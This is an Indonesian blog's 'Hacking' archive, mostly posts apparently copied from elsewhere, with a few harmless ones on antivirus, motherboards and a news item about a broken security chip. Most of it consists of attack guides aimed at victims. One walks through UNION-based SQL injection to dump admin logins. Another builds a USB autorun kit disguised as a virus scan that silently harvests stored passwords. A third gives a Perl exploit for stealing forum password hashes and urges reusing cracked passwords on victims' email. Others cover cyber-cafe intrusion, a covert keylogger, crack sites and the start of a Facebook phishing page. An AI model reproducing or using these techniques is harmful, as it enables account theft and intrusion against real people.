Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

0
Aplikasi Internet Security Terbaik 2013


Jika Anda mencari software antivirus atau internet security yang handal untuk melindungi komputer Anda dan saat Anda sedang browsing, Kami suguhkan beberapa daftar internet security terbaik yang dapat membantu Anda dalam mengamankan data-data penting Anda yang berada dikomputer dan mengamankan data-data pribadi serta data transaksi saat Anda melakukan transaksi di Internet, Berikut ini Internet Security Terbaik 2013:

11
SQL Injection Web dengan Dork

SQL injection merupakan aksi hacking pada keamanan komputer di mana seorang penyerang bisa mendapatkan akses ke basis data di dalam sistem. Langsung aja ya ke permasalahannya yaitu Teknik SQL Injection dengan Dork namun Sebelum men daface sebuah situs, kita bisa menggunakan dork Sql Injection dengan bantuan om google
inurl:"product.php?id=" & intext:"You have an error in your SQL syntax"
Misal yang didapat :
http://www.targetweb.com/detailproduct.php?id=35
untuk mengecek bug pada suatu web tambahkan single quote ( ' ) dibelakang url
http://www.targetweb.com/detailproduct.php?id=35'


Setelah itu akan muncul bug pesan error :
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '\' and b.id=a.cat' at line 1

Untuk mencari column gunakan perintah [ order by ]
http://www.targetweb.com/detailproduct.php?id=35 order by 1--
mulai dari angka 1,2,3 dan seterusnya hingga menemukan pesan error selanjutnya 2, dst sampe muncul pesan error "Unknown column '17' in 'order clause'"
Pesan error muncul pada angka 17
http://www.targetweb.com/detailproduct.php?id=35 order by 17--
muncul pesan error:
Unknown column '17' in 'order clause'

Jadi angka yang diambil adalah 17-1 = 16 (jumlah column adalah 16)

Berikutnya kita akan mencari "angka" dimana dengan angka tersebut kita bisa melakukan injection dengan perintah "union all select"
http://www.targetweb.com/detailproduct.php?id=-35 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
Jangan lupa tambahkan tanda kurang ( - ) didepan angka parameter ID 35

akan muncul "angka" : 4, 7 dan 13
Pilih salah satunya saja, misal 4
Langsung kita cari versi Database MySql-nya dengan perintah [version()] atau [@@version] pada angka 4
http://www.targetweb.com/detailproduct.php?id=-35 union all select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16--

Nanti diweb tersebut akan muncul tulisan :
5.0.91-community
Ternyata versi 5, kalau versi 4 lain waktu akan saya bahas.

Selanjutnya kita akan mencari table-nya dgn perintah "group_concat(table_name)" pada salah satu angka dan menambahkan "+from+information_schema.tables+where+table_schema=database()--" di belakang angka 16
http://www.targetweb.com/detailproduct.php?id=-35 union all select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+where table_schema=database()--

Akan muncul nama-nama table :
login,tbanner,tcatprod,tproduct,tset dan lain-lain

Selanjutnya kita cari column dari table yg ada hubungannya dengan user+password,
kali ini kita ambil table "login"
sebelumnya kita convert dulu ke hexa agar dapat dibaca oleh Sql di sini :
http://cyber4rt.com/~converter
ketik : login
pilih ASCII to Hex
hasilnya : 6c6f67696e

Perintah selanjutnya adalah "group_concat(column_name)" pada angka 4 dan "+from+information_schema.columns+where+table_name=0xHEXA--" di akhir URL

ganti HEXA dengan hasil convert tadi yaitu : 6c6f67696e
tambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvert
ke hexa
http://www.targetweb.com/detailproduct.php?id=-35 union all select
1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16+from+info
rmation_schema.columns+where+table_name=0x6c6f67696e--

muncul column : user,pass

untuk melihat isi dari kedua column tersebut gunakan perintah "group_concat(column1,0x3a,column2)" pada angka ajaib 4 dan +from+NAMATABLE-- pada akhir URL

ganti column 1 dengan " user " dan column 2 dengan " pass "
0x3a adalah tanda titik dua ( : ) yang telah diconvert ke hexa
NAMA TABLE diganti dengan " login " untuk mengambil informasi dari table yang bernama
"login"
http://www.targetweb.com/detailproduct.php?id=-35 union all select
1,2,3,group_concat(user,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16+from+login--

hasil : admin:admin
jadi,
user = admin
password = admin

Selesai pencarian User dan Password, dilanjutkan ke pencarian Page Admin.
Untuk mencari page admin, gunakan aplikasi berikut:
Instant SQLI
Atau juga bisa gunakan Aplikasi Havij

NB: ini saya ambil dari tutor yang saya baca dan sedikit saya ubah bahasa penulisan dan web tujuan.

6
Menggunakan Refog Keylogger

REFOG Keylogger merupakan software berlisensi shareware yang mempunyai kegunaan untuk memantau aktifitas dalam penggunaan komputer. Apa saja aktiftas yang di lakukan bisa di catat dan tersimpan dalam file log. Software REFOG Keylogger ini semacam software spy alias software mata mata.

REFOG Keylogger ini dapat mencatat apa apa saja yang dilakukan orang dalam menggunakan komputer. Misalkan orang itu mengakses situs apa saja yang di kunjungi, menjalankan program apa dan aktifitas lainnya.

Software REFOG Keylogger ini cocok juga buat anda yang memiliki anak dan anak anda itu sudah di berikan hak penuh atas penggunaan komputer yang anda berikan. Apalagi jika anak anda telah diberikan akses internet pada komputer. Dengan software REFOG Keylogger ini, anda bisa memantau situs apa saja yang dikunjungi oleh si anak.

Setelah anda install REFOG Keylogger ini ke dalam komputer yang ingin anda pantau, maka REFOG Keylogger ini akan berjalan tersembunyi, segala aktifitas dalam penggunakan komputer dan user sapa saja yang meng-akses komputer akan tercatat dan tersimpan dalam sebuah file log.

Software REFOG Keylogger ini bisa anda download disitus bawah ini:
Refog
atau
Cnet

3
AddOns Hacking Pada Mozilla Firefox

Tulisan ini ditujukan untuk siapa saja yang tertarik dengan hacking, atau ingin tahu apa yang dimaksud dengan hacking, dan juga bermanfaat bagi siapa saja yang ingin menambah wawasannya tentang komputer dan internet.Namun jangan di salah artikan hacking di sini untuk kebaikan not to be crime. Pertama saya akan memperkenalkan add-on yang bagus buat kalian semua kalian bisa langsung mendownloadnya di sini
Nah sebagai tambahan bonus Add-on mozilla yang powerfull buat hacking Berikut ...


Add-ON HacKing !!!

1. Free Ebook Search : untuk mencari e-book
2. Server Spy : melihat jenis server
3. Domain Finder : mencari data suatu domain
4. Who is : melihat detail situs
5. About This Site : melihat detail situs
6. Tix Now : mematikan timer rapidshare
7. Firebug : mengedit html, css, javascript di virtual hacking
8. XSS-Me : percobaan xss ke situs target
9. SQL Inject Me : percobaan SQL Injection ke situs target
10. Unhide Passwords : melihat password saat kita sniffing di LAN sendiri
11. Tab URL Copier : untuk mencopy paste URL
12. Who Are You? : Mencari data nama seseorang di internet
13. Zoom Fox : memperbesar gambar di web
14. Linkification : melihat http link target
15. XRays : melihat source code dengan tampilannya
16. Amazing Media Browser : mendownload file flash dengan cara hacking
17. Down Them All : mengambil banyak file html diserver target , IDM-nya mozilla.
18. Download Helper : mendownload video hacking
19. Spamborg : untuk pendaftaran email tanpa iklan
20. FasterFox : untuk mempercepat firefox
21. Stylish : menghack stylish di wordpress.com
22. Aardvark : mendelete barner saat melihat source code situs
23. Flashblock : memblock file flash
24. Flash Killer : tidak menampilkan flash agar yang terlihat tulisan saja
25. HostIP.Info.Geolocation : sorot link dan sudah terlihat alamat situs
26. Live HTTP Header : menampilkan http header
27. Fire FTP : sebagai FTP untuk upload file ke situs target
28. View Cookies : untuk melihat cookies
29. Add N Edit Cookies : untuk mengedit cookies
30. IeView : untuk melihat gambar di internet explore
31. Anonymouser : membuat diri tidak terlihat
32. User Agent Switcher : menyamar menjadi browser laen
33. Yahoo! Mail Notifier : menyadap password yahoo
34. GMail Notifier : menyadap password gmail
35. Switch Proxy : mengganti proxy biar aman saat hacking
36. Reload Every : dapat digunakan untuk boom email target
37. Adblock Plus : untuk mengakses email dengan 3 profile
38. Hackbar : untuk mengetikkan URL yang sangat panjang
39. Calling ID Advisor : Bedah situs
40. Bandwidth Meter : untuk mengukur bandwidth kita

Nie juga nih lu check dulu deh :

1. Advanced Dork: untuk pencarian google secara cepat dengan advance operator
2. Cipherfox : memperlihatkan ssl / tls chipper dan key di status bar..
3. Java Console: Untuk menggunakan console via java
4. Copycode: mengijinkan kita untuk memilih text dan mengcopynya secara html
5. Fire Encrypter: memberikan enkripsi / decripsi dan hashing waktu kita hacking
6. FirePHP: mengijinkan untuk masuk firebug console menggunakan simple PHP call..
7. Inline Code Finder For FireBug: Untuk mencari bug menggunakan firebug
8. Page Hacker: menambahkan tombol hack pada halaman yang terpilih
9. Password Hasher: untuk memperlihatkan password
10. Tinyurl Creator: untuk membuat url yang akan kita hack menjadi short
11. SQL Injection : untuk mengetest ketahanan suatu situs terhadap SQL Injection

NB : beberapa mungkin udah ga aktif lagi tapi sekedar pengetahuan buat
lu semua.

Source: Kingofjail

5
The Hacker's Underground

.
Ingin belajar menjadi hacker tapi tidak tahu memulai dari mana? Buku ini adalah salah satu jawabanya. The Hacker's Underground Handbook mengulas berbagai teknik hacking yang populer digunakan. Dari teknik hacking sederhana sampai pada teknik intermediate dan advanced. Disusun oleh David Melnichuk, pendiri blog yang membahas hacking dan keamanan. Anda dapat mengunjungi blognya di http://mrcracker.com.



Daftar isi buku The Hacker's Underground Handbook :

Pendahuluan
- Apa itu Hacker?
- Hacker dan penggolonganya
- Mengapa menjadi seorang Hacker

Pemrograman
- Perlukah mempelajarinya?
- Dimana saya harus memulai?
- Cara belajar terbaik

Password
- Password Cracking
- Phising
- Program-program pencuri password

Network Hacking
- Foot Printing
- Port Scanning
- Banner Grabbing
- Searching the Vulnerabilities
- Penetrating

Wirelless Hacking
- Scanning wireless network
- Cracking WEP
- Packet Sniffing

Windows Hacking
- NetBios
- Cracking windows password

Malware
- Definisi
- Prorat

Web Hacking
- Cross site scripting
- Remote file inclusion
- Local file inclusion



Bookmark and Share

3
Perbedaan Antara Crack, Patch, Keygen?

.
Jika Anda pernah menggunakan atau mendownload software bajakan yang langsung full version, pasti Anda sudah tidak asing lagi dengan nama “crack”. Ya, “crack” lah yang dapat membuat software Anda menjadi full version secara illegal. Namun apakah Anda juga pernah menggunakan “patch” agar software Anda menjadi full version? Bagaimana dengan “keygen”? Apakah Anda juga pernah menggunakannya?

Ketiga nama aneh yang Saya sebut tadi (crack, patch, keygen) merupakan sesuatu yang biasanya Anda temui jika mencari atau mendownload software full version secara illegal. Namun apa sebenarnya perbedaan dari mereka bertiga?

Mari kita bahas satu persatu.

1. Crack

Crack dalam bahasa inggris berarti pecahan / retakan. Sama seperti artinya, crack merupakan bagian dari suatu software yang sudah dirubah isinya oleh seseorang / kelompok. Kebanyakan, bagian yang dirubah isinya oleh “cracker” adalah file executable (*.exe) suatu software, namun ada juga yang merubah isi file library (*.dll). Oleh karena itu, file crack umumnya berekstensi (*.exe) atau (*.dll). Hal ini juga yang menjadi kelemahan suatu crack, kebanyakan crack tidak dapat dipakai pada versi software yang berbeda.

Crack fungsinya bukan hanya dapat membuat software menjadi full version saja, namun juga ada crack untuk game yang dapat membuat game yang seharusnya memerlukan CD original game tersebut, menjadi tidak memerlukan CD lagi. Biasanya crack itu disebut “NoCD-Crack atau NoDVD-Crack”.

Cara menggunakan crack cukup mudah, Anda cukup menginstall softwarenya, lalu mengopy file cracknya ke tempat software tadi di install (me-replace file asli).

Contoh: Anda menginstall software “A” pada folder “C:Program FilesA”, jika Anda punya crack software tersebut, dan cracknya bernama “A.exe”. Anda cukup menaruh file “A.exe” pada folder “C:Program FilesA”. Jika ada peringatan Confirm File Replace, Anda hanya tinggal pilih “Yes”.

Pembuat crack pada umumnya bekerja berkelompok, mereka membuat sebuah “Cracker Team” dengan suatu nama. Jika mereka sudah membuat suatu crack, mereka akan merilisnya pada suatu situs khusus koleksi crack. Mereka juga memberi tanda pada crack yang mereka rilis, biasanya mereka memberi tanda dengan memberi file berisi informasi mereka berekstensi .nfo.

2. Patch / Patcher

Jika diterjemahkan dalam bahasa indonesia, patch berarti tambalan. Patch dalam dunia game pc merupakan tambalan / update dari suatu game untuk memperbaiki error / bug pada game, maupun menambah fitur suatu game. Patch untuk update game ini menggunakan UI (User Interface) agar user dapat dengan mudah mengupdate game favoritnya. Hanya tinggal tekan next, next, i agree, next, lalu update, Patch langsung mengupdate game tersebut secara otomatis. Menambal error dan menambah fitur.

Namun berbeda fungsi antara patch di dunia game dengan dunia pembajakan software, path pada dunia pembajakan memang juga mempunyai UI (User Interface). Namun fungsinya yang berbeda, patch ini menulis data pada bagian software dan registry. Yang biasa ditulisnya adalah file executable software tersebut. Ada juga crack yang menulis pada registry.

Itulah yang menjadi kelebihan patch, ada beberapa patch yang dapat digunakan pada software dengan versi berbeda. Jika ada patch dengan nama misal “Software A Universal Patcher”, berarti patch tersebut dapat digunakan untuk semua versi dari Software A, baik versi 1 maupun 9, patch tersebut tetap dapat digunakan. Lain halnya jika patch tersebut punya nama “Software A 1.xxx Patch”, berarti patch tersebut dapat digunakan pada semua Software A yang punya bersi mayor 1, misal Software A 1.3, Software A 1.8 dan lainnya asal versi mayor (utama) nya masih 1.

Hanya dengan menaruh patch di folder letak Anda menginstall software tersebut, jalankan Patch, dan tekan tombol “Patch”, maka seketika itu juga patch menulis beberapa data pada bagian software dan registry. Setelah proses patching sukses, kini software sudah menjadi full version / terdaftar (registered). Nah, software Anda kini berstatus patched.

Patch dibuat oleh perseorangan / berkelompok. Sama seperti crack, kelompok tersebut juga mempunyai nama masing – masing. Mereka juga merilis patch buatan mereka pada situs – situs crack. Pada umumnya, UI (User Interface) patch unik dan menarik, entah itu memang tradisi mereka atau apa. Sama seperti pembuat crack, pembuat pacth juga menaruh informasi mereka bersama dengan patch yang mereka rilis, indormasi itu berbentuk file berekstensi *.nfo.

3. Keygen

Keygen, merupakan kependekan dari Key Generator. Sebuah program yang dapat menghasilkan serial untuk suatu software. Serial yang dihasilkan oleh sebuah Keygen dapat bermacam – macam dan berbeda, namun tetap mempunyai pola yang sama namun berbeda, contoh mudahnya:

* Serial yang dihasilkan pertama: A1A23
* Serial yang dihasilkan kedua: B2B34
* Serial yang dihasilkan ketiga: C3C45

Nah, seperti itulah contoh mudah pola serial yang dihasilkan oleh sebuah Keygen, namun lebih rumit lagi.


Sebagai contoh saja, ini sedikit daftar situs – situs crack… :)

* cracks.am ==>
* keygen.us ==>
* allcracks.net ==>
* andr.net ==>
* crack.ms ==>
* crackz.ws ==>
* cybercracks.co.uk ==>
* crackarchive.com ==>
* crackdb.com ==>
* crackzplanet.com ==>
* crackway.com ==>
* mscracks.com ==>



Bookmark and Share


4
Hack Password with ur Pen Drive

.
USB TRICKS:

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step by step procedre to create the password hacking toolkit.

NOTE: You must temporarily disable your antivirus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.

ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe andpasswordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from

New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP and Vista

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

Source: Go-Hacking


Bookmark and Share


0
Hack into Forums

.
Hack into Fourms : Tutorial

This is what you like to call “Hacking a forum”.

I call it “Cracking into a forum” … Learn what hacking means you lazy fucks, lol…

PS: I am hacking a forum slowly, everything i am doing now, is posted here by steps :

First of all, what you need is a forum to hack. For the sake of this tutorial, and for the safety of a specific site, I will not release the URL of the site that I will be hacking in this. I will be refering to it as “hackingsite”.

So you’ve got your target. You know the forum to want to hack, but how? Let’s find the user we want to hack. Typically, you’d want to hack the admin. The administrator is usually the first member, therefore his/her User ID will be “1?. Find the User ID of the administrator, or person you wish to hack. For this tutorial, let’s say his/her ID is “2?.

Got it? Well, now we are almost all set. So far, we know the site we wish to hack, and the member we wish to hack. In this case, we are hacking the administrator of “hackingsite”, which is User ID “2?.



Now we need a nice exploit. I preferably, for 1.3.1 forums, use one that is in common circulation around these forums. For those who don’t have it, here:


#!/usr/bin/perl -w

################################################## ################

# This one actually works http://www.quantriweb.com/forum/images/smilies/smile.gif Just paste the outputted cookie into

# your request header using livehttpheaders or something and you

# will probably be logged in as that user. No need to decrypt it!

# Exploit coded by “ReMuSOMeGa & Nova” and http://remusomega.com (http://remusomega.com/)

################################################## ################


use LWP::UserAgent;

$ua = new LWP::UserAgent;

$ua->agent(“Mosiac 1.0? . $ua->agent);

if (!$ARGV[0]) {$ARGV[0] = ”;}

if (!$ARGV[3]) {$ARGV[3] = ”;}

my $path = $ARGV[0] . ‘/index.php?act=Login&CODE=autologin’;

my $user = $ARGV[1]; # userid to jack


my $iver = $ARGV[2]; # version 1 or 2

my $cpre = $ARGV[3]; # cookie prefix

my $dbug = $ARGV[4]; # debug?

if (!$ARGV[2])

{

print “..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org (http://forums.site.org/) [id] [ver 1/2].\n\n”;

exit;

}


my @charset = (“0?,”1?,”2?,”3?,”4?,”5?,”6?,”7?,”8?,”9?,”a”,”b”,”c”,”d”,”e”,”f”);

my $outputs = ”;

for( $i=1; $i < 33; $i++ )

{

for( $j=0; $j < 16; $j++ )

{

my $current = $charset[$j];


my $sql = ( $iver < 2 ) ?

“99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2 527$current%2527)/*” :

“99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i ,1)%3d%2527$current%2527)/*”;

my @cookie = (‘Cookie’ => $cpre . “member_id=31337420; ” . $cpre . “pass_hash=” . $sql);

my $res = $ua->get($path, @cookie);

# If we get a valid sql request then this


# does not appear anywhere in the sources

$pattern = ”;

$_ = $res->content;

if ($dbug) { print };

if ( !(/$pattern/) )

{

$outputs .= $current;

print “$current\n”;


last;

}

}

if ( length($outputs) < 1 ) { print “Not Exploitable!\n”; exit; }

}

print “Cookie: ” . $cpre . “member_id=” . $user . “;” . $cpre . “pass_hash=” . $outputs;

exit;


What the fuck,Pretty confused, aren’t you? What the fuck are you supposed to do with this shit?! I’ll tell you. First of all, this is a Perl script. Copy and paste that code into Notepad.



How can you execute Perl scripts? Well, you can upload them to your CGI-BIN, or you can take my route of preference, and install Perl on your PC.


Your going to want to go and get ActivePerl. I am sure it’s here somewhere in Appz.


Open the file up, and let it install. Leave everything on default. In otherwords, just keep hitting “OK”.


So now you have Perl installed. Open up “My Computer”, and then click on “Local Disk (C:/)”. In there, you should see a folder named “Perl”. Open up that folder, and within “Perl”, you should see another folder named “bin”. Open up “bin”. Now that your in, drag and drop “ipb.pl” from your desktop, into “bin”.


Alrighty. Now everything is fine, and you’re ready to Pwn some FAGS …


What your going to want to do now, is open up your command prompt. If you don’t know how, please quit this site, and die…. Start – Run – CMD


Alright, so now your in your command prompt. You want to change the directory in your command prompt to your Perl/bin directory. To do this, type the following into your command prompt, and hit enter:


cd C:\Perl\bin


Good job. Your very, very close to being finished. Now that you are in the Perl/bin directory, we need to access the ipb.pl file. How do we do this? Type the following command into your command prompt:



perl ipb.pl


So, this is what we need to do. Type the following command into your command prompt:


ipb.pl http://hackingsite.com/forum 2 1


Obviously replace “http://hackingsite.com/forum” with the URL to the forum you wish to hack.


Now, this may take a minute. The exploit is gathering information, and grabbing the hash. Numbers/letters will slowly appear down the screen. Don’t be alarmed, and allow the program a few minutes. Once the hash grabbing is complete, it will return a full hash, as well as User ID.


Now you have the hash. In our case, the hash is: 4114d9d3061dd2a41d2c64f4d2bb1a7f


But what can we do with this hash? To you, it just looks like a scramble of numbers and letters. What this is, is an MD5 hash. This is the person’s password, encrypted using the MD5 algorthrim. I urge you to do a quick read-up on MD5 hash’s before continuing reading.


Done? You understand the very basics of MD5s? Good. You’re probably thinking: I just read that MD5 hashes cannot be cracked!


LOL.. Indeed, MD5s are impossible to reverse. Once a string is MD5ed, there is no way to get it back to plain-text. It is IMPOSSIBLE to decrypt an MD5 hash. But.. It is NOT impossible to CRACK an MD5 hash.



There are many places online where you can enter hashes to be cracked. Personally, I use “Cain & Able”, which is a great MD5 cracker availiable at ‘http://odix.it’.


You can use any method, and any crackers to crack this hash. 90% of the hashes I get, I am able to crack. Once you crack the hash, you will be given a plain-text password.


CONGRATS! You now have the victims password! You can now login to his/her account on whatever forum you were hacking. Hell, you could even try that password on his/her e-mail or MSN/AIM account. SureFire bro, fuck them up


But what if the hash is not crackable? You are merely left with a password hash. What can you do with this?


Well, you can spoof your cookie!


If you would like to learn more on spoofing cookies, use the friendly searching site they call “GOOGLE”


Good luck!



Source: Go-Hacking


Bookmark and Share


1
Hack Closed PC on Cyber cafe

.
Hack Closed PC on Cyber Cafe:

So here is a quick new hack on how to intrude in the PC which is shut downed at Cyber cafe. (Don’t Forget to read our disclaimer at the bottom of the post.)

1. As you all must have know these days all Cyber cafe owners have a program for administration to control all PC’s in local area network. So all files can be inter transmitted.

2. First of all press Ctrl+Alt+Del the task manager or any controlling application, will open. Then from APPLICATIONS select the program that is controlling all PC’s & terminate it, This is for security reason. Now log of PC, & you ll get user names of the PC.

3. But some times, cyber cafes have security clients installed that have restricted access to Task Manager, restart the computer & press F8 continuously before windows boots.

The Menu will open, select Safe Mode from it. And now you can copy files from networked PC’s without any security layer.

Next step is where you’ll need to crack the hashes. SO go to your home PC , Download & install Saminside cracking tool. And from some another Cyber cafe try to crack the hashes of that PC. By same log off method explained below.

This where you actually perform hacking. Have a gret time & tell us weather it worked for you.

Meanwhile if you can get IP address, of the PC you wish to hack try to get it from ip-explorer.com, but this is not the part of this hack its sort of next step of hacking from outside the network.

Disclaimer : The trick here explained it for educational purpose only & not to perform illegal or criminal activities. Don’t forget hacking into some one’s privacy is considered as crime. SO do it on your home network that you own or something. We are not responsible for anything you do & consequences of it by using our articles.

Source: Go-Hacking


Bookmark and Share


0
Fungsi dan Perkembangan Motherboard

.
FUNGSI MOTHERBOARD

Pusat pengendali yang mengatur kerja dari semua komponen yang terpasang padanya.
Mengatur pemberian daya listrik pada setiap komponen PC.
Lalu lintas data semuanya diatur oleh motherboard, mulai dari peranti peyimpanan (harddisk, CD-ROM), peranti masukan data (keyboard, mouse, scanner), atau printer untuk mencetak.

Perkembangan Motherboard

Pada akhir tahun 1980-an dan selama dekade 1990-an, pasar prosesor untuk PC didominasi oleh Intel. Ada beberapa perusahaan prosesor untuk PC, tetapi pengaruh mereka kalah jauh dibanding Intel. Lagi pula rata-rata prosesor buatan mereka masih mengambil desain x86 buatan Intel juga. Mulai akhir tahun 90-an dan awal tahun 2000, kondisi tersebut berubah. Pasar prosesor tidak lagi terlalu tergantung pada Intel, karena pesaing mereka, AMD, mengeluarkan prosesor K6-2 dan Athlon yang ternyata mampu bersaing dengan prosesor buatan Intel.

Dan di tahun itu pula sebuah industri penghasil chipset asal Taiwan, VIA Technologies, juga telah mampu membuat chipset yang berkualitas dan berharga murah. Para produsen motherboard tidak lagi tergantung pada Intel untuk merancang dan membuat motherboard mereka, sehingga perkembangan teknologi dan desain motherboard mengalami peningkatan yang sangat pesat.

Selain itu, demam overclocking juga turut menyumbangkan peranan dalam perkembangan dunia motherboard. Para produsen motherboard berlomba-lomba mengeluarkan motherboard yang dirancang mampu memberikan tingkat overclock yang tinggi, tapi tetap mampu menjaga kestabilan sistem. Pokoknya, kalau ada motherboard yang tidak bisa digunakan untuk meng-overclock prosesor dan memori, maka hampir dapat dipastikan motherboard tersebut kurang laku di pasaran.

Berikut ini daftar produsen Motherboard :
ASUS
ABIT
ECS
GIGABYTE
MSI

ISTILAH-ISTILAH PADA MOTHERBOARD

1. BIOS

Singkatan dari Basic Input/Output System. Merupakan kumpulan informasi motherboard dan juga merupakan software berisi perintah-perintah dasar. Fungsi utamanya adalah sebagai sarana komunikasi antara sistem operasi dengan hardware yang terpasang pada motherboard.

2. Bus

Istilah yang menyatakan sistem aliran data yang digunakan hardware yang terpasang pada motherboard untuk berkomunikasi dengan prosesor. Satuan yang digunakan biasanya adalah frekuensi (Hertz) atau lebar bit data.

3. Clock Speed

Istilah ini digunakan untuk menyatakan kecepatan dari sebuah prosesor atau komponen lainnya. Angka clock speed didapat dari perkalian multiplier terhadap FSB. Semakin tinggi clock speed, maka semakin tinggi kinerja yang dihasilkan oleh prosesor atau komponen hardware tersebut. Satuan yang digunakan biasanya adalah megahertz (MHz) atau gigahertz (GHz). Biasanya disebut juga sebagai kecepatan eksternal dari sebuah prosesor.

4. FSB

Singkatan dari Front Side Bus, yaitu bus utama yang menghubungkan antara prosesor dengan chipset motherboard. Satuan yang digunakan adalah megahertz (MHz).

5. Heatsink

Komponen yang diletakkan di atas prosesor. Fungsinya adalah menyerap panas yang dihasilkan saat prosesor bekerja. Biasanya sebuah heatsink dilengkapi sebuah kipas untuk menjaga agar suhu prosesor tetap stabil.

6. Overclocking

Suatu teknik yang dilakukan untuk meningkatkan kinerja prosesor, memori, atau kartu grafis, dengan cara meningkatkan FSB atau clock speed komponen tersebut. Teknik ini memerlukan sebuah system pendingin khusus pada komponen, karena menghasilkan panas berlebih, di mana panas berlebih ini dapat merusak sistem. PC


Bookmark and Share


2
Hacker Berhasil Bobol Cip Teraman Buatan Infineon

Meski dikira sebagai cip teraman yang tak mungkin dibobol hacker, cip SLE 66 CL buatan Infineon yang saat ini banyak dipakai di komputer, konsol game, kartu kredit, dan perangkat elektronik lainnya tetap jebol juga. Seorang hacker yang bekerja sebagai periset keamanan sukses menembus sistem keamanannya pada Black Hat Conference DC di Arlington, Virginia, AS yang berakhir kemarin.

Seperti dilaporkan situs Dark Reading, Christopher Tarnovsky dari Flylogic Engineering, membeberkan langkah demi langkah teknik tingkat tinggi untuk melakukan hal tersebut. Memang tidak main-main yang dilakukannya karena untuk bisa menembus sistem keamanan cip tersebut, ia harus melakukannya sampai tingkat mikroskopi elektron. "Saya tidak mengatakan cara ini mudah, namun teknologi (cip) tersebut tak seaman seperti dikatakan pembuatnya kepada Anda," ujar Tarnovsky. Dalam demonstrasinya, ia memperlihatkan cara mengatasi hambatan keamanan cip dengan analisis yang sangat rumit dan penuh ketekunan.

Dengan teknik tersebut, Tarnovsky berhasil mengidentifikasi skema inti cip tersebut dan membuat jalur baru untuk mengambil alih akses ke sana tanpa melalui jalur desainnya. Ia berhasil mengakses sistem cip tanpa merusak sistem keamanannya, membaca data di dalamnya termasuk kunci enkripsi dan informasi yang disertakan selama produksi.

Tarnovsky mengatakan secara teori, orang cerdas yang berniat jahat bisa mengekploitasi teknik tersebut untuk melakukan tindak kriminal. Misalnya, untuk mengakses TV berbayar cuma-cuma hingga mencuri data lisensi konsol game seperti XBox.

6
How to Hack Facebook..???

Learn to hack facebook passwords


Are you curious to
"hack facebook password" well then this post is just for you,Most people ask me to tell us the easiest way to hack facebook password,so here are some ways to hack facebook password:

1.Facebook phishing
2.Keylogging
3.Facebook new features
4.virus


But i will explan you the method which has a great success


Update:Due to recent complains i have elobrated the post and change the login script to hack facebook password please check it out


Today we will focus on the But i will explan you the method which has a great success rate and is very easy to use i.e Phishing or fake login page

Fake login page

A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmail etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords.

hack facebook password
PROCEDURE:


First of all download facebook fake login page:

1.once you have downloded facebook fake login page now extract contents in a folder

2.In that ,find (CTRL+F) 'http://ujie-caprone.blogspot.com/' then change it to your destined URL."http://ujie-caprone.blogspot.com/" is the redirection url,When victim will enter his/her email and password he will redirected to the site which you will enter instead of "http://ujie-caprone.blogspot.com/"


Now Save it .

3.Open Fake page in wordpad


4.Now press ctrl+F and search for the term "action=" now change its value to pass.php i.e. action=pass.php


5.Create an id in
